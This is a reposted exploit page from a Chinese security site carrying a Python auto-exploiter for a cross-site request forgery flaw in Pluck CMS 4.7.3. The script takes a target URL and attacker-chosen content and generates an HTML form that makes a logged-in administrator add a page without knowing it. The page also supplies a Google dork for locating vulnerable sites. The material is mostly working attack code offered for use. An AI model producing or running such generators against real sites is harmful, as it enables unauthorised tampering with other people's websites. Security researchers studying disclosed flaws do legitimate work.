首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)
来源:www.ahsan-tahir.com 作者:Tahir 发布时间:2016-10-19  
# Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery
# Exploit Author: Ahsan Tahir
# Date: 18-10-2016
# Software Link: http://www.pluck-cms.org/?file=download
# Vendor: http://www.pluck-cms.org/
# Google Dork: "2005-2016. pluck is available"
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 4.7.3
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
 
import os
import urllib
 
if os.name == 'nt':
        os.system('cls')
else:
    os.system('clear')
 
def csrfexploit():
 
    banner = '''
    +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+
    |  ____  _            _       ____ __  __ ____   |
    | |  _ \| |_   _  ___| | __  / ___|  \/  / ___|  |
    | | |_) | | | | |/ __| |/ / | |   | |\/| \___ \  |
    | |  __/| | |_| | (__|   <  | |___| |  | |___) | |
    | |_|   |_|\__,_|\___|_|\_\  \____|_|  |_|____/  |
    |  //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter |
    |  > Exploit Author & Script Coder: Ahsan Tahir  |
    +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
    '''
    print banner
 
    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
    title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))
    content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")
 
    csrfhtmlcode = '''
    <html>
      <!-- CSRF PoC -->
      <body>
        <form action="%s/admin.php?action=editpage" method="POST">
          <input type="hidden" name="title" value="%s" />
          <input type="hidden" name="seo&#95;name" value="" />
          <input type="hidden" name="content" value="%s" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="keywords" value="" />
          <input type="hidden" name="hidden" value="no" />
          <input type="hidden" name="sub&#95;page" value="" />
          <input type="hidden" name="theme" value="default" />
          <input type="hidden" name="save" value="Save" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    ''' %(url, title, content)
 
    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
 
    print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name+extension
    file = open(filename, "w")
 
    file.write(csrfhtmlcode)
    file.close()
    print(" [+] Your exploit is saved as %s")%filename
    print("")
 
csrfexploit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows (x86) - 'afd
·LanSpy 2.0.0.155 - Local Buffe
·Microsoft Windows Diagnostics
·Cgiemail 1.6 - Source Code Dis
·Ruby on Rails - Dynamic Render
·Windows DeviceApi CMApi PiCMOp
·Firefox 49.0.1 - Denial of Ser
·Windows DeviceApi CMApi - User
·Ruby on Rails Dynamic Render F
·OpenNMS Java Object Unserializ
·VOX Music Player 2.8.8 - '.pls
·Hak5 WiFi Pineapple Preconfigu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved